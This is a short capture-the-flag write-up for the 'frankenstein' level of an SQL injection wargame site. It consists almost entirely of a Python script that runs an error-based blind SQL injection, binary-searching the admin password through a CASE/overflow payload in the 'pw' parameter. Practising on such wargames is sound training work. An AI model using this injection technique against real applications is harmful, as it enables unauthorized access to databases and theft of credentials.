WRITE UP
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 | import requests import re url = "http://los.rubiya.kr/frankenstein_b5bab23e64777e1756174ad33f14b5db.php" session = {'PHPSESSID':'MY_SESSION'} data = {} flag="" a=0 b=0xffffffffffffffffffff while b-a!=0: center = hex(a+(b-a)//2+1) if(len(center)%2!=0): center = "0x0"+center[2:] data['pw']="' or id='admin' and case when pw<"+center+" then 1 else 9e307*2 end#" res = requests.get(url, params=data, cookies=session) if "config" in res.text: b=int(center,0)-1 else: a=int(center,0) flag = bytes.fromhex(hex(a)[2:]).decode('utf-8') flag = re.match('\S*',flag).group().lower() print("[∞] flag : "+flag) data['pw']=flag res = requests.get(url, params=data, cookies = session) if "Clear!" in res.text: print("[♪] FRANKENSTEIN Clear!") | cs |
